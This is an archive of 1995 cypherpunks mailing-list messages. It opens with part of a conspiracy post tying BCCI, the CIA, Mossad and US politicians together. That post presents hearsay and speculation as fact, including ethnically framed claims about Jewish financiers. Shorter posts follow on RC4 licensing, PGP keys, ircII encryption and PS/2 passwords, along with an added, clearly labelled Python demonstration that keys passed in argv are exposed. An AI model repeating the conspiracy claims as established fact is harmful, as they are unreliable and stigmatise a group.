available to Carter, and accompanied the former President to Thailand,
Tibet, Hong Kong, and the Soviet Union, among other places.  Carter
introduced Abedi to many heads of state, from Deng Xiaoping in China to
James Callaghan in the U.K.  Abedi donated a half million dollars to
establish the Carter presidential library, and a public policy institute
at Emory University.
			  
       In the meantime BCCI founder Abedi was committed to the development 
of an *Islamic atomic bomb*, even donating 500 million rupees for the 
creation of Pakistan's Gulam Ishaq Research Institute for nuclear 
development. 

       BCCI was in some sense seen by Abedi as the financial competitor to 
the "committee of 30" that worked on behalf of Israel. (According to Israeli 
correspondents Tzadok Yehezkeli and Danny Sadeh: "Israel solicits money 
from wealthy Jews from all over the world for financing its nuclear 
weaponry programs.  This fundraising drive is directed by a committee 
comprised of 30 Jewish millionaires" [review of book *Critical Mass* in 
*Yediot Ahronot*, January 30, 1994].)
	    
       But while BCCI founder Abedi had intended BCCI to finance the 
development of a Pakistani nuclear bomb, this effort was compromised at 
the start by the presence of Kamal Adham, who through CCAH was the 
controlling power behind First American, and who had asked Clark Clifford 
to head up the bank. For Adham was both a CIA and a Mossad asset. Adham, 
in addition to being Faisal's most trusted advisor and the former head of 
Saudi intelligence, had attended CIA training school with the head of the 
Mossad.  

	"Kamal Adham, who was the CIA's principal liaison for the 
	entire Middle East from the mid-1960's through 1979, was
	the lead frontman for BCCI in its takeover of First American,
	was an important nominee shareholder in BCCI, and remains one 
	of the key players in the entire BCCI affair" (Senator John
	Kerry and Senator Hank Brown, *The BCCI Affair: a Report to 
	the Committee on Foreign Relations, United States Senate*,
	December 1992).

	Perhaps that is why Pakistan's efforts to develop their own
nuclear bomb met with repeated compromises, such as the following:

	"In 1983 a Dutch court convicted Dr. Abdul Qader Khan, head 
	of Pakistan's nuclear program, on charges of stealing the
	blueprints for a uranium enrichment factory. . . . Khan's
	lawyer was paid by BCCI.

	"In 1984, three Pakistani nationals were indicted in Houston
	for attempting to buy and ship to Pakistan, high-speed
	switches designed to trigger nuclear weapons.  The trio
	offered to pay in gold supplied by BCCI.

	"In 1987 two Americans, Rita and Arnold Mandel, together with
	Hong Kong businessman Leung Yu Hung, were indicted by the
	U.S. Attorney in Sacramento, California, on charges of illegal
	importations of $1 billion worth of oscilloscopes and computer
	equipment for Pakistan's nuclear program. . . . BCCI facilitated
	[some of the shipments]" 
	
	"In 1987 in Philadelphia, Ashad Pervez, a Pakistani-born
	Canadian, was indicted for conspiring to export restricted
	specialty steel and metal used to enhance nuclear explosions.
	...  He . . . paid high prices with money delivered to the 
	Toronto BCCI branch from BCCI London" (Rachel Ehrenfeld,
	*Evil Money*, HarperCollins, 1992).

	BCCI became an important conduit for CIA intelligence, and also 
a ready target for the tentacles of the NSA.  When Norman Bailey at the 
National Security Council urged NSA to "follow the money" as part of the 
"wars" on terrorism and drugs, the NSA had BCCI as one obvious banking 
target.  The CIA was there also to assist in the monitoring of BCCI-related 
money flows of other intelligence and criminal enterprises. For BCCI had 
become a giant laundry machine, and the CIA made use of BCCI for their own 
covert money transfers.  

	One example involves Manuel Noriega, who was recruited by the
U.S. Defense Intelligence Agency in 1959, who went on the CIA payroll in
1967, and who became head of Panamanian military intelligence in 1968,
where he was in a strategic position to supply both information and drugs
to the United States, and later on arms to the contras in an operation
based in Panama, Mexico, and Mena, Arkansas.  CIA money was paid to
Noriega through the Panamanian branch of BCCI.  The CIA and U.S. Army
only acknowledge paying Noriega $322,226 between 1955 and 1986 (*The
New York Times*, January 19, 1991).  Be that as it may, Noriega 
deposited $33 million in his account (under the name of the Panamanian 
Defense Forces) at the Panamanian branch of BCCI. The head of this branch 
was the son of a former director of intelligence in Pakistan.

	The CIA also used BCCI branches in Pakistan to launder payments
to the Afghan rebels, and Pakistani officials used the same bank to
launder heroin profits.  The finance minister of Pakistan, Sarti Asis,
confirms that the bank did launder CIA contributions to the Afghan
rebels, but claims it was "not even handling 1 percent of total drug
money" (*Financial Times*, July 25, 1991).

	The amount the CIA recalls paying Noriega is too small.  Noriega 
had much earlier gotten into trouble with the State Department because of
his drug dealing.  But this changed when his support was needed in
the negotiations for a new Panama Canal Treaty.

	"By 1976, Noriega was fully forgiven.  CIA Director George
	Bush arranged to pay Noriega $110,000 a year for his services,
	put the Panamanian up as a houseguest of his deputy CIA
	director, and helped to prevent an embarrassing prosecution
	of several American soldiers who had delivered highly
	classified U.S. intelligence secrets to Noriega's men.
	. . .

	"If Carter needed friends in Panama to smooth the way for
	a canal treaty, Reagan (who strongly opposed that treaty)
	needed them to support the Contra cause. . . . CIA payments
	to Noriega resumed when Reagan took office in 1981, starting
	at $185,000 a year.  At their peak, in 1985, Noriega
	collected $200,000 from the Agency.  The CIA deposited the
	money in Noriega's account at the Bank of Credit and Commerce
	International, two of whose units later pleaded guilty to 
	laundering drug money.  CIA Director William Casey frequently
	met with Noriega alone in Washington" (Peter Dale Scott and
	Jonathan Marshall, *Cocaine Politics:  Drugs, Armies, and the
	CIA in Central America*, University of California Press, 1991).

	That Noriega was necessarily used as an NSA asset also follows from 
the fact that Panama served as the listening post to much of South America.
       
	The Bush-Noriega-BCCI-Mena connection continued.  Barry Seal, who 
flew money, drugs, and arms out of Mena, Arkansas, acquired his job through 
George Bush.  After Seal was indicted in Ft. Lauderdale, Florida, in 1983 for 
a shipment of 200,000 Quaaludes, he tried in vain to make a deal with the 
DEA.  He found a more sympathetic audience in the Vice President:  
". . . in March 1984, while out of jail on an appeal bond, 'Seal flew his 
Lear jet to Washington and telephones Vice President Bush's office'; and he 
spoke on the street to staff members of the vice president's South Florida 
Task Force" (Scott and Marshall).

	How did Jackson Stephens react to all this activity in his back
yard?  Well, among other things, Stephens and his Worthen National Bank 
invested in Harken Energy, a Texas company in which George Bush, Jr., was 
a board member.  "The money Stephens invested came through the Swiss BCCI 
subsidiary" (Rachel Ehrenfeld).

	What about Bill Clinton, Governor of Arkansas?  Ex-CIA agent
Cord Meyer has privately confided to a friend of mine (to whom Meyer has
no reason to lie) that he recruited Clinton through the London station
while Clinton was a student in England.  This Clinton was hardly ignorant 
of CIA activity or devoid of CIA contact.

	In 1987 First American bought the National Bank of Georgia, formerly 
acquired from Bert Lance by Pharaon. Another BCCI-First American connection
was Robert Gray, a First American director, and head of the Washington 
office of the public relations firm Hill & Knowlton.  Gray represented
BCCI and did favors for Caspar Weinberger, among others.

	"In October 1988, three days after the Bank of Credit and
	Commerce International (BCCI) was indicted by a federal
	grand jury for conspiring with the Medellin Cartel to
	launder $32,000,000 in illicit drug profits, the bank hired
	H&K [Hill and Knowlton] to manage the scandal.  Robert Gray
	also served on the board of directors of First American 
	Bank, the Washington D.C. bank run by Clark Clifford (now
	facing federal charges) and owned by BCCI.  Gray was close
	to, and helped in various ways, top Reagan officials.  When
	Secretary of Defense Caspar Weinberger's son needed a job,
	Gray hired him for $2,000 a month"  ("Hill & Knowlton,
	Robert Gray, and the CIA," by Johan Carlisle, *Covert Action
	Quarterly*, #44, Spring 1993).

	It was also Hill & Knowlton, you will recall, who later brought us 
the staged melodrama in the House Human Rights Caucus.  The production
starred the tearful "Nayirah"--in fact daughter of the Kuwaiti Ambassador to 
the U.S. She told of Iraqi soldiers taking babies out of incubators and 
leaving them on the cold floor to die. (Someone later alleged that her 
follow-up story about Iraqi soldiers roasting Belgian babies, using bayonets 
as spits, had to be dropped when it was discovered that there were in fact 
no Belgians in the Middle East.) George Bush was to repeat this concocted 
story a dozen times in the next few days, in the process of whipping up war 
fever against his old business associate, Saddam Hussein.

	BCCI was closed down by the Bank of England, acting in conjunction
with others, on July 5, 1991. When BCCI closed, many of its money-management, 
money-laundering, and monetary-intelligence duties were transferred to
FinCEN, a newly created unit of the U.S. Treasury.  

	The Mena connections to Clinton and Bush have now, through Jackson 
Stephens, been extended to Robert Dole.  Jackson Stephens (along with Tyson) 
has recently thrown his support behind the Dole campaign.  In this regard it 
is perhaps useful to note that:

	"On November 27, 1987, an Arkansas State Police detective 
	received a call from a reporter for information about an 
	investigation into an aircraft maintenance firm named Rich 
	Mountain Aviation. Located at a small airport in the little 
	town of Mena, which stands virtually alone in the far west 
	of Arkansas near the Oklahoma border, Rich Mountain was at
	the center of secret operations including cocaine smuggling 
	in the name of national security. The reporter was seeking 
	confirmation that the drug network operating out of Rich 
	Mountain was part of Lt. Colonel Oliver North's network. 
	He believed this group was smuggling cocaine into the US
	through Mena and using the profits to support the Contras 
	as well as themselves.

	"Arkansas State Police Detective Russell Welch  . . . was 
	called by an Arkansas sheriff six weeks later who related 
	that he had information indicating that US Senator Robert 
	Dole was concerned about the Rich Mountain investigation. 
	In particular, the sheriff's informant stated that Dole was 
	worried that the investigation might in some way harm
	George Bush" (Alan A Block, "Drugs, Law, and the State,"
	Hong Kong University Press, 1992).
	
	By contrast to Pakistan's ultimately inept attempt at nuclear
weapon construction, Israel's nuclear warfare system had thrived.  Parts
of this system included the national military command center, the Bor,
located beneath Tel Aviv; the subterranean strategic air command post on 
the edge of the Negev at Nevatim Air Base; the nuclear fuel reactor at  
Dimona; the nuclear weapons laboratories at Nahal Soreq; the missile test 
range at Yavne; the underground factory at Be'er Yaakov where the
Jericho long-range missiles are manufactured; the nuclear weapons
design lab (Division 20) and missile design development lab (Division
48) and weapons assembly plant at Rafael; the nuclear weapons bunkers in 
the Negev at Tel Nof Air Base; and the Jericho missiles in bunkers west 
of Zekharyeh in the Judean hills.

	"By marrying atomic bombs first to long-range aircraft in the
Black Squadrons and ultimately to intercontinental ballistic missiles,
Israel became the first Third World country to pose a strategic threat to
a superpower.  That development was not lost on the Kremlin.  Following
the test in September 1989 of an advanced Jericho-2 ballistic missile,
whose range covered the oil fields at Baku and could possibly reach the
port of Odessa as well, a Soviet Foreign Ministry spokesman said that 
'Israel is known to possess a technological basis necessary for the creation
of nuclear weapons.  The availability of delivery systems makes Israel
a source of danger, far exceeding the boundaries of the Middle East
region'" (William E. Burrows and Robert Windrem, *Critical Mass*, Simon
& Schuster, 1994).
		  
	Where did the money to pay for all this come from?  In the beginning 
it was a simple matter of collecting donations. "In 1960, a Committee of 
Thirty (Jewish millionaires) was asked to quietly raise funds for the nuclear 
weapons project.  It collected $40 million for the construction of the 
reactor and the adjoining, fabulously expensive, underground plutonium 
separation plant at Dimona" (Burrows and Windrem).

	But life did not stay this simple.  For example, the BCCI-Bush-
Noriega-Mena connection to drug smuggling was matched by a similar Israeli 
connection to arms and drug dealing and money laundering. Anything went in 
the holy crusade to build the bomb and the associated missile delivery 
systems.  Just as the pension funds controlled by Robert Maxwell were 
looted to pay for Mossad operations in Europe (Victor Ostrovsky, 
*The Other Side of Deception*, HarperCollins, 1994, p. 203), so were 
American S&Ls in effect looted (or burdened with debt) by the financial 
machinations of the "Committee of Thirty" to help generate the vast 
funds needed to maintain and expand Israel's defense industry.  Some of 
these funds found their way into offshore accounts held by U.S. politicians 
and defense personnel as bribes, kickbacks, "campaign" contributions, 
and payment for stolen secrets.
	
	That, for example, Noriega was a Mossad, as well as CIA, asset 
follows from the fact his closest confidant and advisor was Michael Harari, 
formerly number three man in the Mossad, who specialized in assassination.  
Harari had fouled-up a case and had the wrong man killed, and was transferred 
to Mexico where he became station chief for Latin America.  After allegedly 
retiring, Harari went to Panama as a security advisor to Noriega, where 
he trained UESAT, Noriega's elite personal bodyguards.  During the U.S. 
invasion of Panama, the U.S. helped Harari escape back to Israel.
	    
	On the Central and Latin American money-laundering side, Scott 
and Marshall relate, in a long footnote:

	"One of the most intriguing reports of an Israeli-Colombian
	drug connection was the story in *Hadashot* that the Cali
	cartel 'employs Israelis, especially in transferring funds
	from drug sales in the U.S. to the bank accounts of the heads 
	of the cartel in Colombia and Panama.  They are also assisted
	by banking services in Israel' (September 1, 1989).  The
	newspaper alleged that the Cali cartel is run by Colombian
	Jews; actually, they are only involved in its money-laundering
	operations.  Jews who emigrated from Europe in the 1930s
	established banking and money-channels exploited by the drug 
	entrepreneurs in the 1970s and 1980s (interview with a federal
	agent, November 15, 1989).  One of the chief Cali money
	launderers was Isaac Kattan, a drug associate of both Alberto
	Sicilia-Falcon and Juan Ramon Matta Ballesteros (Mills,
	*Underground Empire*, 168; Kerry report, 286-88).  Kattan
	boasted that he invested his millions in Israel bonds 
	(*Newsweek*, July 20, 1981).  Kattan had connections to
	Nicaraguans through the cocaine-trafficking Espinosa brothers
	(*New York Times*, February 28, 1981) and the Popular Bank
	and Trust, owned by a prominent Nicaraguan exile and used as
	a conduit for Contra and State Department humanitarian funds
	(*Miami Herald*, June 14, 1987; *Village Voice*, July 1, 1986).
	In 1988, federal authorities broke up a nationwide money-
	laundering ring serving the Cali cartel.  It was run by two
	Israelis who won the cooperation of a network of Hassidic
	Jews and a former Israeli Air Force captain by claiming
	they were moving the money on behalf of Mossad to finance
	'anti-Communist guerrillas in Central America,' presumably
	the Contras. (Ibid; *Kol Ha'ir*, April 14, 1989; *Northern
	California Jewish Bulletin*, January 13, 1989; United Press
	International, March 17, 1989.)
	
	Nuclear weapons.  Money laundering.  This juxtaposition leads 
us back to BCCI and a body in Virginia.  The death of investigative reporter 
Danny Casolaro was, like that of Vince Foster, alleged to be "suicide" in 
the face of all contrary evidence.  Three days before his murder at the
hands of hut-dwelling wackos, Casolaro showed a friend some checks drawn 
on BCCI:  

	"Ben Mason [an old friend] arrived at Casolaro's about 
	3:30 P.M. 'I was really hungry and anxious to go get 
	something to eat,' he recalled, 'but he was taking his 
	time, as usual. He took me downstairs, pulled out a box, 
	and showed me some pages. Five separate pages, spread 
	them out on the floor. The first had something to do 
	with some arms deals. I remember the name Khashoggi.
	It was about Iran-Contra.'

	"The second and third pages were photocopies of checks, 
	made out for $1 million and $4 million; they were 
	photocopies of checks drawn on BCCI . . . accounts
	held by Adnan Khashoggi, the international arms merchant 
	and factotum for the House of Saud, and by Manucher 
	Ghorbanifar, the arms dealer and Iran-Contra middleman."          
	(James Ridgeway and Doug Vaughan, "The Last Days of Danny 
	Casolaro," *The Village Voice*, October 15, 1991).

			[To be continued]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBljlmX1Kn9BepeVAQFJ5gP+IGqG2mCF9u0FVKpNzJYCfLMv8ip+LFcY
lfOOczoK0V1znELeJc1R531/sYMC2iNxKR5O8z8eYiQX87qS054xcu1k+ye6QY1G
z77tgFD3sQqu+4utEhkCD4o+BpwzdZ1dc3w+ZgEEIHtwPwZWzbmn7g1cvIvpdIJv
LGwiE7dD/tw=
=WIpY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Fri, 28 Jul 95 16:37:03 PDT
To: cypherpunks@toad.com
Subject: Re: RC4
Message-ID: <v02130501ac3ee1843139@[199.117.100.37]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>So, does anyone know for certain if this is the true letter of the law?
>Since RC4 has been reverse engineered (or leaked) to the public, do they
>have any claim on it if there is no patent?  Seeing the legal web that
>surrounds a lot of the current crypto situation in the US, it's not
>surprising that RSA would try to smoke screen everyone into thinking that
>there would be a clear violation (prosecutable by law) if anyone used RC4
>without getting a license.  (It's also not surprising that no one's tried
>as well...)

An acquaintance of mine at a now-defunct company compared the reverse
engineered RC4 work-alike that was released on the net with the source they
had licensed from RSADSI.  She noted that the implementations were quite
different (structure and variable names were both very different), so the
work-alike released on the net was indeed most likely reverse engineered.
Someone else queried two or three other BSAFE source licensees, and found
all agreed that the code was not cribbed from BSAFE sources.  Sadly, I no
longer have copies of the (anonymous) post.

Still, I'm not rich enough to punch through RSADSI's smoke screen...


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBky1fobez3wRbTBAQHh2AP/dPCZxvp8W2CXG/mqN7iuYc1oH+t0XiH8
wAnNQ2+0BbWzVyzt3YalUp6/JPXDBm1kGVWxmy+UUY8y0dfYpsi78T4aQxoPpG13
Kfc7MQat77SGvhRzNAcMei0h+hyMUmwGqnaetuSGIbFcyPbcnn4F8nq8JBOHXHcF
03+m959OKVk=
=wTxS
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 28 Jul 95 15:06:46 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: <plonk> now! Grabbe, X, re. Foster, NSA, BCCI, etc.
In-Reply-To: <Pine.SOL.3.91.950728171939.22819C-100000@use.usit.net>
Message-ID: <199507282206.SAA11720@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Brad Dolan writes:
> Subject: Part X: Allegations re Vince Foster, the NSA, and Bank Spying
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 	 Allegations Regarding Vince Foster, the NSA, and 
> 	       Banking Transactions Spying, Part X

This is cypherpunks, a mailing list for people interested in
cryptography and its social implications. This is not "Conspiracy
Buffs Digest: All The Silly Conspiracy Theories You Can Read".

Please take the noise postings elsewhere.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Al Billings" <mimir@io.com>
Date: Fri, 28 Jul 95 18:09:05 PDT
To: cypherpunks@toad.com
Subject: Word cracking
Message-ID: <199507290108.AA18206@relay.interserv.com>
MIME-Version: 1.0
Content-Type: text/plain



 I have a Microsoft Word document that is encrypted in some fashion. 
Does anyone know of any utilities to crack whatever Encryption is in 
Word 6.0?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 28 Jul 95 15:29:02 PDT
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <QQzaju18595.199507282134@relay4.UU.NET>
Message-ID: <9507282222.AA29615@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> On Fri, 28 Jul 1995, Dr. Frederick B. Cohen wrote:
> 
> > Philo Zimmerman would almost certainly
> > win if they ever took him to court, but by harassing him in this more
> > subtle way, they destroy the impact of PGP in the marketplace, get MIT
> > to support an official (and perhaps customized for the NSA to have weak
> > keys) version,
> 
> I've personally pulled apart the innards of both MIT pgp 2.6.2 and the 
> non-MIT pgp 2.6.2i in order to generate large primes and full RSA keys.  
> 
> There are no hacks in MIT pgp that cause it to generate weak keys.

How (specifically) do you know that this is true?  Key generation is
very tricky stuff, and very subtle changes can have very profound impacts.
I doubt that Zimmerman's original was truly perfect at this either, but
how do we really know?

-- 
-> See:  Info-Sec Heaven using our New Super Secure World-Wide-Web Server
-> Free: Test your system's security (scans deeper than SATAN or ISS!)
---------------------- both at URL: http://all.net ----------------------
-> Read: "Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95
-------------------------------------------------------------------------
   Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 28 Jul 95 15:29:13 PDT
To: cypherpunks@toad.com
Subject: IRC encryption
Message-ID: <m0sbxti-0009tPC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


I've ducked out of the IRC world mostly after the first couple years, but
this looks like you could setup pgp/rsa.perl/something that would be
interesting:

*** Help on ENCRYPT
Usage: ENCRYPT [<nickname>|<channel> [<key>]]
  ENCRYPT allows you to hold an encrypted conversations with
  a person or a whole channel.  Once a nickname/channel and
  key is specified, all messages you send to that
  nickname/channel will automatically be encrypted using the
  given key.  Likewise, any messages from that nickname/channel
  will automatically be decrypted. ircII is smart enough to know
  if the incoming message isn't encrypted and will not attempt to
  decrypt it.  If you received an encrypted message from someone
  for whom you haven't specified a key, it will be displayed as
  [ENCRYPTED MESSAGE].

  The <key> can be any text which is to be used an they key
  for encryption/decryption of the conversation.  It is up to
  you and the people you wish to talk to about how to agree upon
  a key and how to communicate it to one another.

  For example, if user CheeseDog wishes to talk encryptedly with
  user DogCheese, they must first agree on an encryption key
  (case sensitive), say foo.  Then user CheeseDog must issue a
    ENCRYPT DogCheese foo
  and user DogCheese must issue a
    ENCRYPT CheeseDog foo
  Thereafter, all messages sent between CheeseDog and DogCheese
  will be encrypted and decrypted automatically.

  If ENCRYPT is given with a nickname but no key, then encrypted
  conversation is ended with that user.  If ENCRYPT is given with
  no arguments, the list of encrypted user and keys are
  displayed.

  IrcII uses a built in encryption method that isn't terribly secure.
  You can use another if you so choose, see SEE ENCRYPT_PROGRAM
  for information about this.

  If you are sending encrypted messages to a user or channel, you
  can toggle it off and on in a message line by inserting the
  control-E character in the input line.  This is usually done
  by hitting control-Q then control-E.  An inverse video E will
  appear in the input line.

Note:
  Control-q is bound (see BIND) to quote_character by default.
  It is frequently necessary to change this to some other char.

See Also:
  SET ENCRYPT_PROGRAM
*** You have new email.
*** No help available on encrypt_program: Use ? for list of topics
*** Help on ENCRYPT_PROGRAM
Usage: SET ENCRYPT_PROGRAM <encryption program path>
  Sets the program used to encrypt and decrypt messages.  The
  program selected must take an encryption key as the first
  command line argument to work with IRCII.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95
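
[Added example, not part of the original post and not ircII code.] The help text above says an ENCRYPT_PROGRAM receives the key as its first command-line argument; on a multi-user Unix host a process's arguments are readable by other local users, so a wrapper that hands the key on that way exposes it for as long as the helper runs. The sketch below uses a stand-in helper (HELPER, key_exposed and the sample key are assumptions made for illustration) and compares passing the key in argv with passing it over stdin.

```python
import os
import subprocess
import sys

# Stand-in for an external encryption helper (hypothetical, not ircII's):
# it takes the key from argv[1], the interface the help text describes,
# or from the first line of stdin, then idles so it can be inspected.
HELPER = (
    "import sys, time\n"
    "key = sys.argv[1] if len(sys.argv) > 1 else sys.stdin.readline()\n"
    "time.sleep(30)\n"
)


def visible_command_line(pid):
    """Return the argument vector of `pid` as other local processes see it."""
    proc_file = f"/proc/{pid}/cmdline"
    if os.path.exists(proc_file):
        # Linux: argv is exposed as a NUL-separated byte string.
        with open(proc_file, "rb") as fh:
            return fh.read().replace(b"\0", b" ").decode(errors="replace")
    # Other Unix systems: ps reports the same information.
    out = subprocess.run(
        ["ps", "-o", "args=", "-p", str(pid)],
        capture_output=True, text=True, check=False,
    )
    return out.stdout


def key_exposed(key, via_argv):
    """Start the helper with `key` and report whether the key shows up
    in the helper's process listing while it is running."""
    args = [sys.executable, "-c", HELPER]
    if via_argv:
        args.append(key)              # key becomes part of the command line
    child = subprocess.Popen(args, stdin=subprocess.PIPE)
    try:
        if not via_argv:
            # Key travels over a pipe that only parent and child can read.
            child.stdin.write(key.encode() + b"\n")
            child.stdin.flush()
        return key in visible_command_line(child.pid)
    finally:
        child.kill()
        child.stdin.close()
        child.wait()


if __name__ == "__main__":
    sample_key = "constructed-key-7f3a"   # constructed sample value
    print("key in argv  -> visible in process list:",
          key_exposed(sample_key, via_argv=True))
    print("key on stdin -> visible in process list:",
          key_exposed(sample_key, via_argv=False))
```
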



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Fri, 28 Jul 95 17:41:06 PDT
To: owner-cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <QQzajx27588.199507282224@relay4.UU.NET>
Message-ID: <199507290040.UAA26790@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri Jul 28 18:24:16 1995: you scribbled...
> 
> The answer is to have some non-USA entity build shareable full fledged 
> full powered crypto libraries and provide them for free for the rest of 
> the world and for all machines.

Wouldn't there still be licensing issues to deal with (in the states at
least)??  I'm sure RSA would claim that the package would be in violation
of the licensing...

(this doesn't mean i'm not all for it.  I only wish i was outside of the
states to help... :(

...alex...

     Alex Tang  altitude@cic.net   http://petrified.cic.net/~altitude
   CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer
       Viz-It!: Software Developer (Check out http://vizit.cic.net)
  UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jon cameron <cellf@free.org>
Date: Fri, 28 Jul 95 20:32:04 PDT
To: cypherpunks@toad.com
Subject: Re: PS/2 passwd bypassed at bootup?
In-Reply-To: <199507290120.VAA01748@gmerin.dialup.access.net>
Message-ID: <Pine.BSD.3.91.950728222439.4594C-100000@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jul 1995, Gary Merinstein wrote:

> > I have my crummy IBM PS/2 passwd protected upon turning it on.
> > I know that removing the battery in a PS/2 deletes the password.
> > But can it be bypassed by an MIS-type if that person has an 
> > administration-type of diagnostic/setup/boot-up floppy?
> > 
> > Jon C.
> > 
> 
> when you type the power-on passwd, adding a slash to the end of it should 
> delete it for future power-ons:
> 
> passwd/new-passwd	changes password
> passwd/			removes password (actually it changes it to the
> 			null string).
> 
> if you remove the password, you will then need the setup disk if you want to 
> re-install the power-on password. 
> 

I understand how that works, but how did the admin-dude bypass my passwd 
(a combo of six letters/numbers only known to me)?  My log file says that 
he only made one attempt at getting in.

Can CMOS store my passwd AND perhaps an admin passwd established in CMOS 
before I received the crummy PS/2?  Is it encrypted?  Do CMOSes in 
general encrypt their passwds ==> can code be added where the passwd is 
stored?  How much space is in the "memory" of CMOS?

Thanks for all the replies...

Jon C.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Sat, 29 Jul 95 00:04:05 PDT
To: cypherpunks@toad.com
Subject: The Net (short movie review)
Message-ID: <199507290703.AAA06086@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Don't bother.  Better to wait until it hits the video shelves then have a party and see who can find the most (of many) technical flaws and gaffes.  Would be much more entertaining in that context.

No crypto or standard Cypherpunk discussion topics (more hacker related with security software trapdoors, cell phone eavesdropping, general hacker mischief, and corporate conspiracies).  Mostly a chase movie with computers and the Internet thrown in to differentiate it from your typical ho-hum flick of this genre.  Poor character development, predictable plot, and hokey effects (my wife kept elbowing me because I was the only one in the theater laughing at certain parts).  

Your standard, computer illiterate citizen will further be misled on the potential evils of computers.  Fortunately, no four horsemen stuff.  (Would be interesting to find some willing Hollywood type and script an accurate flick with a crypto good-guy/gal to promote the cause).

Buying a couple of magazines at the Barnes and Noble next to the theater would have definitely been a better entertainment value.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sat, 29 Jul 95 00:36:36 PDT
To: cypherpunks@toad.com
Subject: Military Prisons for Citizen-Units
Message-ID: <ac3f32b004021004c868@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:42 PM 7/28/95, Brian Davis wrote:
>The military is not authorized to listen in to any phone calls they want
>to hear.  Otherwise, everyone on the list, including me, would probably
>be in some hidden military prison.
>
>:-)  for the humor-impaired.

This is not so.

The military _did_ put me in one of their hidden military prisons, but
decided I would be more useful on the Cypherpunks list. I recognize several
other names here from my work brigade.

--Citizen-Unit Tim "The Zek" May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 28 Jul 95 17:15:31 PDT
To: cypherpunks@toad.com
Subject: Re: New release (v1.3) of CFS Unix encrypting file system now available
Message-ID: <199507290015.AA12526@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze sez:

: Source code for the latest version (release 1.3) of CFS, the Cryptographic
: File System, is now available upon request for research and experimental
: use in the US and Canada.

[..]

: If you would like a copy of the CFS source code, please read to the end
: of this message and then send email to:

: 	cfs@research.att.com

: DO NOT REPLY DIRECTLY TO THIS MESSAGE.  You must include a statement
: that you are in the US or Canada, are a citizen or legal permanent
: resident of the US or Canada, and have read and understand the license
: conditions stated above.  Be sure to include an email address in a US-
: or Canada-registered domain. The code will be sent to you via email in
: a "shar" shell archive (a little over 300K bytes long).


Now, this would be very handy, unfortunately I'm no American or Canadian.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Sat, 29 Jul 95 01:15:49 PDT
To: cypherpunks@toad.com
Subject: Hello.public mixmaster access
Message-ID: <199507290815.DAA01637@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


would some kind soul make available MIXMASTER client thru telnet????

of course less security but Some of us don't have Unix Access So it would Help!!


as long as Reasonable Care is Taken it should be Safe Enuff?for Most uses?

Making Client default shell For a Guest User would be Easy and Safe!and
Client stay on That Host so No Exporting Done!so Someone Please!!

10x all!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Sat, 29 Jul 95 02:18:11 PDT
To: cypherpunks@toad.com
Subject: Re: <plonk> now! Grabbe, X, re. Foster, NSA, BCCI, etc.
In-Reply-To: <199507282206.SAA11720@panix4.panix.com>
Message-ID: <199507290917.DAA11439@bert.cs.byu.edu>
MIME-Version: 1.0
